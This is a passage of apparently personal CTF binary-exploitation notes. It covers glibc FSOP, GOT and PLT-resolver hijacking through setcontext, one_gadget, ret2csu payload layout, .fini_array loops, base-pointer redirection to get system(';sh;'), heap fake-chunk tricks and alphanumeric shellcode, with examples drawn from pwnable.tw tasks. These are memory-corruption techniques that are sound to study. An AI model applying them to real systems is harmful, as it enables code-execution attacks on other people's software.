While glibc's absractions are having pointers to callbacks to next level of abstraction, hackers will find a way to pwn it.

1. _IO_str_jumps (I took it's layout from https://github.com/lattera/glibc/blob/master/libio/strfile.h) :

	If we are working with string-stream we'll work with special FILE structure :
	
		typedef struct _IO_strfile_ {
		  struct _IO_streambuf _sbf;
		  struct _IO_str_fields _s;			<== if we can modify this
		} _IO_strfile;
		
	Where _sbf is :
	
		struct _IO_streambuf {
		  _IO_FILE _f;
		  const struct _IO_jump_t *vtable;
		};
		
	And _s is :
	
		struct _IO_str_fields {
		  /* These members are preserved for ABI compatibility.  The glibc
		     implementation always calls malloc/free for user buffers if
		     _IO_USER_BUF or _IO_FLAGS2_USER_WBUF are not set.  */
		  _IO_alloc_type _allocate_buffer_unused;	<== we can modify this
		  _IO_free_type _free_buffer_unused;		<== and this
		};
		
	So, this "const struct _IO_jump_t *vtable" is _IO_str_jumps - special vtable for string-stream structs.
	It has JUMP_FIELD(_IO_overflow_t, __overflow) field which uses this _IO_alloc_type _allocate_buffer_unused callback.
	It means that if we overwrite this address and trigger __overflow we'll get arbitrary execution.
	This callback takes an argument as a new_size of buffer and our problem transforms to solving of an equation with :
	
		char *_IO_buf_base;	/* Start of reserve area. */
	  	char *_IO_buf_end;	/* End of reserve area. */
	  	
	  	new_size = 2 * old_size + 100, where old_size = _IO_buf_end - _IO_buf_base. (+100 as usual, but also can do +10. Need debug)
	  	
	  All of what we need - shift address of _IO_str_jumps so that target event (for example __xputn) pulls __overflow callback.
	  As we now, it will use "_allocate_buffer_unused" and "_IO_buf_end & _IO_buf_base" which we can control.
	  But don't forget to substitute buf pointers to write_ptr >= write_base to trigger "_allocate_buffer_unused" or try to do "honest" overflow.

================================================================================
6. BONUS
================================================================================

6.1 Off-By-One
------------------------------------------------------------------------------

Sometimes a program doesn't check the condition when we are writing at an index
which equals the length of the buffer. It means that we can rewrite one chunk
after the buffer.

It can include max available values or metadata of the chunk header. If we
rewrite it we can get control of critical structures to get access to something.


6.2 PLT-Trampoline
------------------------------------------------------------------------------

If we have a not small primitive of writing to the .got section of our binary
we can make a very powerful attack. All we need - ".got grooming" before
exploitation.

But before this let me tell you about a couple of technical things:

    1) The beginning of .got section includes very important addresses for
       lazy-bound: with +0x8 offset the linkage map and with +0x10 offset
       the address of the resolver.

    2) After .got overwrite we can rewrite RIP as we want including a part of
       the .plt section which calls the resolver (the beginning of .plt) and
       we'll call these instead of a valid glibc function:

       0000000000001020 <.plt>:
           1020:  ff 35 72 2f 00 00       push   QWORD PTR [rip+0x2f72]        # 3f98 <_GLOBAL_OFFSET_TABLE_+0x8>
           1026:  f2 ff 25 73 2f 00 00    bnd jmp QWORD PTR [rip+0x2f73]        # 3fa0 <_GLOBAL_OFFSET_TABLE_+0x10>

So, after rewriting _GLOBAL_OFFSET_TABLE_+0x8 and _GLOBAL_OFFSET_TABLE_+0x10
we can take full control of the execution of the program - we just put the
address of the argument to the stack and call the function we need.

I can even show a real case for you:

    0000000000045be0 <setcontext@@GLIBC_2.2.5>:
       45be0:  57                      push   rdi
       45be1:  48 8d b7 28 01 00 00    lea    rsi,[rdi+0x128]
       45be8:  31 d2                   xor    edx,edx
       45bea:  bf 02 00 00 00          mov    edi,0x2
       45bef:  41 ba 08 00 00 00       mov    r10d,0x8
       45bf5:  b8 0e 00 00 00          mov    eax,0xe
       45bfa:  0f 05                   syscall
       45bfc:  5a                      pop    rdx
       45bfd:  48 3d 01 f0 ff ff       cmp    rax,0xfffffffffffff001
       45c03:  73 5b                   jae    45c60 <setcontext@@GLIBC_2.2.5+0x80>
       45c05:  48 8b 8a e0 00 00 00    mov    rcx,QWORD PTR [rdx+0xe0]
       45c0c:  d9 21                   fldenv [rcx]
       45c0e:  0f ae 92 c0 01 00 00    ldmxcsr DWORD PTR [rdx+0x1c0]
       45c15:  48 8b a2 a0 00 00 00    mov    rsp,QWORD PTR [rdx+0xa0]
       45c1c:  48 8b 9a 80 00 00 00    mov    rbx,QWORD PTR [rdx+0x80]
       45c23:  48 8b 6a 78             mov    rbp,QWORD PTR [rdx+0x78]
       45c27:  4c 8b 62 48             mov    r12,QWORD PTR [rdx+0x48]
       45c2b:  4c 8b 6a 50             mov    r13,QWORD PTR [rdx+0x50]
       45c2f:  4c 8b 72 58             mov    r14,QWORD PTR [rdx+0x58]
       45c33:  4c 8b 7a 60             mov    r15,QWORD PTR [rdx+0x60]
       45c37:  48 8b 8a a8 00 00 00    mov    rcx,QWORD PTR [rdx+0xa8]
       45c3e:  51                      push   rcx
       45c3f:  48 8b 72 70             mov    rsi,QWORD PTR [rdx+0x70]
       45c43:  48 8b 7a 68             mov    rdi,QWORD PTR [rdx+0x68]
       45c47:  48 8b 8a 98 00 00 00    mov    rcx,QWORD PTR [rdx+0x98]
       45c4e:  4c 8b 42 28             mov    r8,QWORD PTR [rdx+0x28]
       45c52:  4c 8b 4a 30             mov    r9,QWORD PTR [rdx+0x30]
       45c56:  48 8b 92 88 00 00 00    mov    rdx,QWORD PTR [rdx+0x88]
       45c5d:  31 c0                   xor    eax,eax
       45c5f:  c3                      ret

We can just prepare a setcontext struct (ucontext_t as I remember) somewhere
in memory and put its address to _GLOBAL_OFFSET_TABLE_+0x8 and put the address
of setcontext + offset to pop rdx to _GLOBAL_OFFSET_TABLE_+0x10.

It resets all registers including rsp and basically can give a reverse shell
if we place in rdi "/bin/sh\0" and place RIP on system() with aligned RSP,
because we control it too. Or just make execve with stack pivoting.
Your border is your imagination here ;)


6.3 One Gadget
------------------------------------------------------------------------------

If we have only 1 qword (or dword if we are working with 32-bits) to overflow
and you have a libc leak we can use the one-gadget technique.

It means that we'll call a part of libc code which calls execve("bin/sh\0",
arg1, arg2) where arg1 = rsi and arg2 = rdx.

But you should be sure that rsi and rdx are valid addresses or NULL.
Just two rules. execve() does something like "lazy reading" - it will look at
the arguments when it's necessary and all of this is because we can just put
an address from the address space of our process (with flag for reading) and
start execve(). But the best way to do this - get NULL in argv & envp.
[True definition of valid argv/envp is an array with pointers to strings
with "arguments" which ends by NULL pointer.]

So, output of one_gadget utility on ruby looks like:

    $ one_gadget /usr/lib/x86_64-linux-gnu/libc.so.6

    0xde6c3 execve("/bin/sh", rbp-0x40, r13)
    constraints:
      address rbp-0x38 is writable
      rdi == NULL || {"/bin/sh", rdi, NULL} is a valid argv
      [r13] == NULL || r13 == NULL || r13 is a valid envp

rbp-0x40 and r13 means that rsi and rdx will be get from them.
It means that with address <libc_base> + 0xde6c3 we have a one gadget.
Let's check an objdump:

    [one gadget part]
    de6c3:  4c 8d 35 72 97 0c 00    lea    r14,[rip+0xc9772]        # 1a7e3c <...>
    de6ca:  48 89 7d c8             mov    QWORD PTR [rbp-0x38],rdi
    de6ce:  4c 8d 65 c0             lea    r12,[rbp-0x40]
    de6d2:  4c 89 75 c0             mov    QWORD PTR [rbp-0x40],r14
    de6d6:  eb 83                   jmp    de65b <execvp@@GLIBC_2.2.5+0xab>

    [execvp part]
    00000000000de5b0 <execvp@@GLIBC_2.2.5>:
    de5b0:  48 8b 05 01 6a 13 00    mov    rax,QWORD PTR [rip+0x136a01]        # 214fb8 <...>
    de5b7:  48 8b 10                mov    rdx,QWORD PTR [rax]
    de5ba:  e9 61 04 00 00          jmp    dea20 <execvpe@@GLIBC_2.11>
    ...
    de8d6:  48 8b 7d a8             mov    rdi,QWORD PTR [rbp-0x58]
    de8da:  4c 89 ea                mov    rdx,r13
    de8dd:  4c 89 e6                mov    rsi,r12
    de8e0:  4c 89 45 90             mov    QWORD PTR [rbp-0x70],r8
    de8e4:  e8 67 fc ff ff          call   de550 <execve@@GLIBC_2.2.5>

Finally we'll call execve().
P.S. You can use already known techniques like stack pivoting to control RSP/RBP
or use program logic to groom our "future arguments" (if it's possible of course)
if you haven't NULL pointers.

P.s you probably will be faced with another "rules" of the one gadget
For example - $esi must points to libc.got.plt section and other

6.4 __libc_csu_init Exploitation aka ret2csu
------------------------------------------------------------------------------

Every GCC binary (without -nostdlib compiling flag) has the __libc_csu_init
function, so this initializes libc, libc's structures,
__frame_dummy_init_array_entry, __do_global_dtors_aux_fini_array_entry
and others.

If you haven't PIE or found a way to leak the code address you can use the
ret2csu technique (you can use it to call read()/write()/open() and others in .plt).

Let's look at the disasm:

    0000000000400ba0 <__libc_csu_init>:
      400ba0:  41 57                   push   r15
      400ba2:  41 56                   push   r14
      400ba4:  49 89 d7                mov    r15,rdx
      400ba7:  41 55                   push   r13
      400ba9:  41 54                   push   r12
      400bab:  4c 8d 25 be 11 20 00    lea    r12,[rip+0x2011be]        # 601d70 <__frame_dummy_init_array_entry>
      400bb2:  55                      push   rbp
      400bb3:  48 8d 2d be 11 20 00    lea    rbp,[rip+0x2011be]        # 601d78 <__do_global_dtors_aux_fini_array_entry>
      400bba:  53                      push   rbx
      400bbb:  41 89 fd                mov    r13d,edi
      400bbe:  49 89 f6                mov    r14,rsi
      400bc1:  4c 29 e5                sub    rbp,r12
      400bc4:  48 83 ec 08             sub    rsp,0x8
      400bc8:  48 c1 fd 03             sar    rbp,0x3
      400bcc:  e8 17 fb ff ff          call   4006e8 <_init>
      400bd1:  48 85 ed                test   rbp,rbp
      400bd4:  74 20                   je     400bf6 <__libc_csu_init+0x56>
      400bd6:  31 db                   xor    ebx,ebx
      400bd8:  0f 1f 84 00 00 00 00    nop    DWORD PTR [rax+rax*1+0x0]
      400bdf:  00
      400be0:  4c 89 fa                mov    rdx,r15
      400be3:  4c 89 f6                mov    rsi,r14
      400be6:  44 89 ef                mov    edi,r13d
      400be9:  41 ff 14 dc             call   QWORD PTR [r12+rbx*8]
      400bed:  48 83 c3 01             add    rbx,0x1
      400bf1:  48 39 dd                cmp    rbp,rbx
      400bf4:  75 ea                   jne    400be0 <__libc_csu_init+0x40>
      400bf6:  48 83 c4 08             add    rsp,0x8
      400bfa:  5b                      pop    rbx
      400bfb:  5d                      pop    rbp
      400bfc:  41 5c                   pop    r12
      400bfe:  41 5d                   pop    r13
      400c00:  41 5e                   pop    r14
      400c02:  41 5f                   pop    r15
      400c04:  c3                      ret
      400c05:  90                      nop
      400c06:  66 2e 0f 1f 84 00 00    cs nop WORD PTR [rax+rax*1+0x0]
      400c0d:  00 00 00

Parts 0x400bfa - 0x400c04 and 0x400be0 - 0x400be9 look interesting, so try
to find a way how you can exploit it until you read down.

This will be actually the most elegant way to assemble a ROP chain unless you
have in the binary gadgets like:

    pop rdi ; ret
    pop rsi ; ret
    pop rdx ; ret

(or you can't get a libc leak yet) and if you have a writing primitive to
9-10 gadgets (buffer overflow or arbitrary write or stack pivot) if you want
to just complete one function or 16-20 gadgets if you want to continue ROP
(stack pivot is a good way or large writing primitive if you have it).

We can separate this function into 2 parts:

    [Part 1 - Pop registers]
      400bfa:  5b                      pop    rbx
      400bfb:  5d                      pop    rbp
      400bfc:  41 5c                   pop    r12
      400bfe:  41 5d                   pop    r13
      400c00:  41 5e                   pop    r14
      400c02:  41 5f                   pop    r15
      400c04:  c3                      ret

    Preparing r15, r14, r13d to move them to rdx, rsi, edi and preparing r12
    & rbx to get an address of an address which points to the part of code
    (double pointer because call waits for an address), so you can put in rbx
    the address of .got divided by 8 and r12 = 0. It works, because the
    address of .got section points (and its address % 8 == 0) to an address
    from libc (and rbx will be multiplied by 8).

    [Part 2 - Call via registers]
      400be0:  4c 89 fa                mov    rdx,r15
      400be3:  4c 89 f6                mov    rsi,r14
      400be6:  44 89 ef                mov    edi,r13d
      400be9:  41 ff 14 dc             call   QWORD PTR [r12+rbx*8]

    So, after returning to this part from the previous part we'll transfer
    control with arguments which we want. But look at the part after the
    called function returns:

      400bed:  48 83 c3 01             add    rbx,0x1
      400bf1:  48 39 dd                cmp    rbp,rbx
      400bf4:  75 ea                   jne    400be0 <__libc_csu_init+0x40>
      400bf6:  48 83 c4 08             add    rsp,0x8

    Okay, we'll just increment rbx and compare it with base pointer. They must
    be equal if we plan to continue ROP. But after this we need to consider
    the stack state because rbx, ..., r15 will be popped again (so, we can use
    several ret2csu techniques in one ROP).

Payload may look like:

    1. 0x400bfa              (first part of __libc_csu_init)
    2. target_address / 8    (rbx)
    3. target_address / 8 + 1
    4. 0                     (r12 is zero because rbx * 8 already points properly)
    5. 1st arg               [dword] (r13d -> edi)
    6. 2nd arg               [qword] (r14 -> rsi)
    7. 3rd arg               [qword] (r15 -> rdx)
    8. 0x400be0              (second part of __libc_csu_init)

    9, 10, ... gadgets may be args to the next call of another function via
    __libc_csu_init or just be a continuation of the ROP.


6.5 Anyway Check What Stack / Heap / .data & .bss Includes
------------------------------------------------------------------------------

When I was solving a task from pwnable.tw (deaslr 500) I faced a large writing
primitive and no way to leak any address.
So, I just needed to look at the stack and find an ld.so gadget which
calculated an address based on the content in $rbx and an offset in $r15.
When you are solving the same tasks - without leaks, gadgets like these and
arithmetics are your best friends.
You have to try to find something which the address space of your process
already includes.

If you are thinking that potentially way to pwn it is wrong, first of all
be sure that it is. Just check objdump and analyze it : "Why it's wrong?"
For example, when I solved "dubblesort" from also pwnable I thought that
system('/bin/sh') couldn't be called properly, because payload must have 
specific format - I couldn't just put [pop ebx ; ret -> '/bin/sh' -> system]
But system() already took an argument from the stack and it argument must 
be place under the address of system()... So, I tried to use one_gadget,
make a ret2main, leak canary to build context, leak ld to find correct
gadget instead just buid payload from 2 parts with that knowledge...
So, before discard the variant I advise you to make sure "at the lowest level"
that you a right... Or not ;)
And if you have two variants — try the simpler one first on remote, 
because environment differences can kill an elegant local exploit

In conclusion I must tell you that our deal is always guessing, discovering
and hope that we'll find a way to pwn it. But of course, without brilliant
technical knowledge this point is unreachable.

6.6 .init_array / .fini_array overwrite
------------------------------------------------------------------------------

When your process was deployed, first of all code _start (or another entry tag) was called
It provides arguments such as main address, init wrapper and fini wrapper to initializator
Next, _start calls __libc_csu_init with those arguments and init wrapper was called as beginning
after libc and other initialization it calls main and after main returning it calls 
fini wrapper. 
Of cource these wrappers need arguments like special structures as .init/.fini_array
which include addresses of especially resolvers' codes and situate at the .data/.bss sections as usual
So, if you have arbitrary write primitive with Partial RelRO and no PIE or you know addresses
you'll can overwrite those structs
It means that you can take a control of beginning/ending of a program (ending as usual)
via overwriting resolvers' addresses and after main code goes to your instructions instead of ends

Look at this : 

	void processEntry entry(undefined8 param_1,undefined8 param_2) {
	  undefined1 auStack_8 [8];
	  FUN_00401eb0(main,param_2,&stack0x00000008,FUN_004028d0,FUN_00402960,param_1,auStack_8);
	  while( true );
	}

FUN_004028d0 - init wrapper
FUN_00402960 - fini wrapper

Now find structs : 

	readelf -a ./prog | grep -E ".init_array|.fini_array"
	  [15] .init_array       INIT_ARRAY       00000000004b40e0  000b30e0		<== addresses at the rw-
	  [16] .fini_array       FINI_ARRAY       00000000004b40f0  000b30f0		    section (.data or .bss)
	  
0x00000000004b40f0 is an address of .fini_array. Let's check it in gdb : 

	gef➤  x/2gx 0x0000000004b40f0
	0x4b40f0:       0x0000000000401b00      0x0000000000401580
	
Well, these are addresses of fini resolvers. Let me explain you what are mean :

	0x4b40f0 + 0x0 ==> 0x0000000000401b00 - addres of _do_global_dtors_aux which destructs
						global objects like structs and another obj
						which not destructed to ending of a prog.
						It was called after 0x0000000000401580
						
	0x4b40f0 + 0x8 ==> 0x0000000000401580 - address of __libc_csu_fini which finalize our main
						and another prog resourses. It triggers all of finalizators 
						and destructors including _do_global_dtors_aux
						via basically calls or rets
						
	But content of these addresses still depends by linker. I advise you to check it anyway
	So, after execution of [ 0x4b40f0 + 0x8 ] control transfers to [ 0x4b40f0 + 0x0 ].
	
All of what are we need - overwrite one of these to get a one more "cycle" via [ 0x4b40f0 + 0x8 ]
or both of them ( _do_global_dtors_aux + __libc_csu_fini ) to make one "cycle" + one block of code 
or endless "cycle" of main. Let's look at the last way :

	If FUN_00402960 (which address is 0x402960) is fini wrapper just put it instead of _do_global_dtors_aux
	at [ 0x4b40f0 + 0x0 ]
	And address of main instead of __libc_csu_fini at [ 0x4b40f0 + 0x8 ]

	gef➤  x/2gx 0x0000000004b40f0
	0x4b40f0:       0x0000000000402960      0x0000000000401b6d
						
	Finally, after main we go to [ 0x4b40f0 + 0x8 ] to execute it's code == go to main again
	And after main's returning we'll go to [ 0x4b40f0 + 0x0 ] - to the fini wrapper 
	instead of _do_global_dtors_aux
	Next, fini wrapper will looks at the [ .fini_array + 0x8 ] == [ 0x4b40f0 + 0x8 ] and will see 0x401b6d 
	It think that it's a resolver address and calls it - calls main!
	And after main's ending we'll go again to [ 0x4b40f0 + 0x0 ]. I think you got it ;)
	
	p.s. if you have went here after ROP part - let me to tell you a couple of word about 'leave'
	In my case : 
	after cycles of the main $rbp became was equal to .fini_array's address and let me to used
	'leave' to pivot stack to .fini_array + 0x8 address (rsp -> .fini_array ; pop rbp took one qword 
	from a top of stack and rsp + 0x8) where with +0x8 offset from $rsp (+0x10 from .fini_array)
	I already had a groomed "stack frame" with a ROP chain
	
	If you interested I had two ways (my payload began at .fini_array + 0x10) : 
		1) rewrite [ .fini_array + 0x8 ] to "ret" gadget and go to ROP chain immediately
		2) don't do this and pass one more main calling to after main's "ret" 
		go to [ .fini_array + 0x10 ] ROP
		
6.7 Arguments control via $EBP/$RBP
------------------------------------------------------------------------------

In such cases when you have "partial" or full arbitrary write primitive & you have a stack leak
You can make the $EBP/$RBP control attack. I hope you understand stack-frame layout.
Any arguments and local variables depends on stack pointer address. So, your binary via "lea" 
with offset from stack pointer calculates addresses of local variables and uses it in the code.
So, if you have a way to overwrite this pointer to prepared memory space you'll can control 
function with it's arguments.

Let's look at an example :

	void handler(void) {
	  int selected_opt;
	  char input [22];

	  do {
	    printf("> ");
	    read(input,0x15);						<== CONTROL THIS
	    selected_opt = atoi(input);					<== GOT OVERWRITTEN
	    switch(selected_opt) { < callbacks for each case > }
	  } while( true );
	}

This handler() calls something callback where we have arbitrary write primitive
It means that we can find a base pointer of this callback and overwrite it to payload
(for example - address near GOT sections)

After callback's finish base pointer becomes our overwrited address

	mov esp, ebp
	pop ebp			<== HERE
	ret

It means that next cycle of handler() will calculate local variable addresses relative our rewritten base pointer
So, input will becomes $ebp + 0x22. And if we put atoi@got - 0x22 to $ebp, read() will be called like 

	read(atoi@got, 0x15);
	
And we'll overwrite atoi@got arbitrary data. For example - system() address concatenated with ";sh;"
And next atoi() will be called like system(system + ";sh;")
Command string interpreter will try to execute address of system, but won't can do it
Next, it will look at the first ";" and will understand that prompt doesn't end and go to next command
Which situaded at the left side from first ";". The second ";" to be sure that "sh" string terminated
To be safe from garbage data from the right side from "sh"
And we'll got a shell

6.8 Condition issues
------------------------------------------------------------------------------

Sometimes process checks itself conditions after executing something
It means that it can do something, for example realloc(ptr, 0) from unexpected function,
after it check : "Can user do free via realloc(ptr, 0) from this fn?" 
and finally log warning about wrong attemp to do this.

So, we can do something unexpected thing which denied by programm's logic
But programm pass it because process checks condition after that event.

Look at the example (from re-alloc, pwnable.tw) :

	There is part of vulnerable reallocate() function:
		
		__size = read_long();
		    
		if (__size < 0x79) {
			reallocated = realloc(*(void **)(heap + idx * 8),__size);
			
			if (reallocated == (void *)0x0) {
			    puts("alloc error");		  <== after log about allocation error function ends
			}
		}
	
	And this is the "correct" free part - rfree():
	
		realloc(*(void **)(heap + idx * 8),0);
    		*(undefined8 *)(heap + idx * 8) = 0;		  <== pointer invalidation
    		
    	So, if we free chunk via this rfree() we'll set ptr to NULL and loose UAF primitive
    	But if we free chunk via reallocate with __size = 0 we'll free chunk but won't invalidate ptr
    	It means that we can do realloc() at this chunk again and overwrite 'fd' and 'bk' ptrs 
    	
6.9 How to put fake chunk to unsorted bin
------------------------------------------------------------------------------

As we know, one way to leak libc address is free chunk to unsorted bin.
It's fd & bk becomes main arena addresses. But what if we can allocate size only less than 0x80?
If you have arbitrary write primitive via tcache-poisoning or something else,
you can assembly several fake chunks with properly chunk structure (header + data).

In my case (tcache-tear from pwnable) I placed fake chunk with fake header to .data
and tried to free it... And I got memory corruption on smth like that in free().
The fact in that free() when tcache fullfilled and size more than 0x80 (max available for fastbin)
checks not only one chunk struct - it checks that one fake chunk with fake size, next chunk
and next after next chunk! It expects valid 2 next chunks to check : "Can I consolidate next chunks with chunk from free()?"

It means that I must do care about 3 consecutive chunks with 3 conditions :
	
	1. Structures of fake chunks must be properly
	2. Structures of fake chunks must be aligned on 0x10 bytes
	3. PREV_INUSE flag must be set to pass consolidation
	
Well, and after all of those my fake chunk really was freed to unsorted bin and via UAF I got libc leak.

6.10 NX unknown
------------------------------------------------------------------------------

Unknown NX means that process isn't sure about memory protection of any page.
If such binary executing remotely you'll can try to ret2shellcode to any writeable page (remotely it's rwx).
But locally heap still can be rw- like another pages (.data, heap, stack and other).
For debug you can do mprotect(start*, n, 0x7) for necessary page via gdb.
I faced with it during solving Death_note from pwnable.

When checksec shows you :
	
	[*] '/home/sayhi/Desktop/ctf/pwnable/solved/death-note/death_note'
	Arch:       i386-32-little
	RELRO:      Partial RELRO
	Stack:      Canary found
	NX:         NX unknown - GNU_STACK missing <== RIGHT HERE
	PIE:        No PIE (0x8046000)
	Stack:      Executable
	RWX:        Has RWX segments
	RUNPATH:    b'./lib/'
	Stripped:   No
	
It's a reason to try shellcoding if you can't find another way to pwn it ;)

6.11 Unaligned address of malloc from fastbins
------------------------------------------------------------------------------

Interesting fact : malloc() must returns address which aligned by 0x10 bytes.
But I discovered for myself that it's not exactly. 
So, before glibc 2.41, when fastbin dup don't required movement chunks from fastbins to tcache
you can make arbitrary allocation if "environment" looks like chunk structure.
It means that you can substitute "fd" pointer to any address which includes valid "size" field.
And if you want to get the allocation where you haven't properly structure at aligned address,
You can use this trick to bypass (fastbin) !prev_size sigabort :

All of we need - memory space where you want to allocate must includes value which we can use as size.
Don't forget that fastbins chunks fd points to header of another chunk. Unlike fd at tcache.
Let me show example at FSOP context:

	So, this is a _IO_FILE_plus structure of stdout. And we want to overwrite it's vtable address.

		gef➤  x/30gx 0x7ffff7bc4620
		0x7ffff7bc4620 <_IO_2_1_stdout_>:       0x00000000fbad2887      0x00007ffff7bc46a3
		0x7ffff7bc4630 <_IO_2_1_stdout_+16>:    0x00007ffff7bc46a3      0x00007ffff7bc46a3
		0x7ffff7bc4640 <_IO_2_1_stdout_+32>:    0x00007ffff7bc46a3      0x00007ffff7bc46a3
		0x7ffff7bc4650 <_IO_2_1_stdout_+48>:    0x00007ffff7bc46a3      0x00007ffff7bc46a3
		0x7ffff7bc4660 <_IO_2_1_stdout_+64>:    0x00007ffff7bc46a4      0x0000000000000000
		0x7ffff7bc4670 <_IO_2_1_stdout_+80>:    0x0000000000000000      0x0000000000000000
		0x7ffff7bc4680 <_IO_2_1_stdout_+96>:    0x0000000000000000      0x00007ffff7bc38e0
		0x7ffff7bc4690 <_IO_2_1_stdout_+112>:   0x0000000000000001      0xffffffffffffffff
		0x7ffff7bc46a0 <_IO_2_1_stdout_+128>:   0x000000000a000000      0x00007ffff7bc5780
		0x7ffff7bc46b0 <_IO_2_1_stdout_+144>:   0xffffffffffffffff      0x0000000000000000
		0x7ffff7bc46c0 <_IO_2_1_stdout_+160>:   0x00007ffff7bc37a0      0x0000000000000000
		0x7ffff7bc46d0 <_IO_2_1_stdout_+176>:   0x0000000000000000      0x0000000000000000
		0x7ffff7bc46e0 <_IO_2_1_stdout_+192>:   0x00000000ffffffff      0x0000000000000000
		0x7ffff7bc46f0 <_IO_2_1_stdout_+208>:   0x0000000000000000      0x00007ffff7bc26e0 <== vtable's address

	As you can see, if we want to do this we must do allocation no more at 0x7ffff7bc46f8.
	Fine, but we have an interesting value at _codecvt field at 0x7ffff7bc46c0. 
	What if we look at this layout with small "shifting" of target address?
	
		gef➤  x/30gx 0x7ffff7bc46bd
		0x7ffff7bc46bd <_IO_2_1_stdout_+157>:   0xfff7bc37a0000000      0x000000000000007f
		0x7ffff7bc46cd <_IO_2_1_stdout_+173>:   0x0000000000000000      0x0000000000000000
		0x7ffff7bc46dd <_IO_2_1_stdout_+189>:   0x00ffffffff000000      0x0000000000000000
		0x7ffff7bc46ed <_IO_2_1_stdout_+205>:   0x0000000000000000      0xfff7bc26e0000000 <== vtable's address ending
		0x7ffff7bc46fd <_IO_2_1_stdout_+221>:   0xfff7bc454000007f      <== vtable's address beginning

	So, right at 0x7ffff7bc46bd we have absolutely valid header of chunk with size 0x70 (incliding 0x10 bytes of header)
	and flags PREV_INUSE | IS_MAPPED | NOT_MAIN_ARENA (0x7f = 0b0b1111111). 
	If PREV_INUSE set we can have data (of previous chunk)  which overwrite prev_size field of chunk header.
	
	And via fastbin dup :
	
		0x555555a021c0: 0x0000000000000000      0x0000000000000071
		0x555555a021d0: 0x00007ffff7bc46bd      0x0000000000000000
					...
		0x555555a02260: 0x0000000000000000      0x0000000000000071
		0x555555a02270: 0x0000555555a02161      0x0000000000000000
	
	The next malloc( <0x60 - 0x68> ) returns 0x7ffff7bc46cd which will help us to overwrite vtable pointer of stdout.
	
6.12 Unaligned malloc size to potentially off-by-one
------------------------------------------------------------------------------

When you call malloc(X), X will be aligned to 0x10 bytes and 0x10 bytes will be added to this value and you'll get the "size" field
But what is a side of alignment? It depends on X. If you put value which has low nibble which less or equal to 0x8,
allocator will align it downward and you'll get a way to fill "prev_size" field of the next chunk. For example : 

	This is what you can fill with malloc(0x18) :
		0x603020:       0x0000000000000000      0x0000000000000021
		0x603030:       0x6161616161616161      0x6161616161616161
		0x603040:       0x6161616161616161      0x0000000000000101 <== potentially off-by-one
		
	If a process does something like "put null byte after reading/copying" (sprintf, strcpy, strdup for example) 
	you can overwrite "size" field and get a way to reach overlapping chunks or something else (topchunk size control)
	
6.13 Polymorphic shellcode
------------------------------------------------------------------------------

So, I'm not sure that you can be faced with this case at new tasks but I was faced and I can't don't explain it :)
At the "alive_note" task from pwnable.tw any data sections (including heap) were executable but so strong "firewall" was.
I can put only "alnum symbols" (english alphabet a-z A-Z and printable digits 0x30-0x31) and space 0x20.
Btw, exist "death_note" yet where filter passes only printable symbols, but it's more soft.
It means that I have very small set of opcodes which would help to build shellcode. 
So, I had to do the polymorphic shellcode which will transforms itself during execution to bypass filter 
to get such opcodes as pop ebx and int 0x80 and '/bin/sh\x00' at the stack and other useful values.
In similar case operations like push/pop & inc/dec & xor/end are you best friends.

Here are a couple of my advices :

	1. Use esp to handle the stack via push esp; pop ecx
	2. Save zeros to set arguments ecx & edx to zero
	3. Use je/jne if you can put only separated shellcode
	4. Look around. Already exist opcodes like 0x00 maybe aren't malicious to your shellcode
	5. You can get almost any value via XOR ([reg + offs] ^ reg)
	6. Negative values can be useful with XOR (just dec)
	7. If you have large space to shellcode don't be afraid from a lot "inc"/"dec"
	8. Via "stack" pointer (ecx) make stack grooming to get what you need
	9. You must find a something "base" pointer which helps you to XOR opcodes to bypess filter
	
Here are some opcodes which are "alnum symbols" :

	50 - push   eax		58 - pop    eax
	51 - push   ecx		59 - pop    ecx
	52 - push   edx		5a - pop    edx
	54 - push   esp
	
	49 - dec    ecx		41 - inc    ecx
	4a - dec    edx		43 - inc    ebx
	4b - dec    ebx
	
	66 31 50 68 - xor    WORD PTR [eax+0x68],dx
	30 50 41    - xor    BYTE PTR [eax+0x41],dl
	20 59 41    - and    BYTE PTR [ecx+0x41],bl (if space is valid sym)

	68 5a 5a 73 68 - push   0x68735a5a
	68 5a 62 69 6e - push   0x6e69625a
	
	74 41 - je     + 0x41
	75 41 - jne    + 0x41

===================================================================
And don't forget : "control is an illusion, but a very useful one"
So, that's all at this time. Now you are on your own. Good luck :)
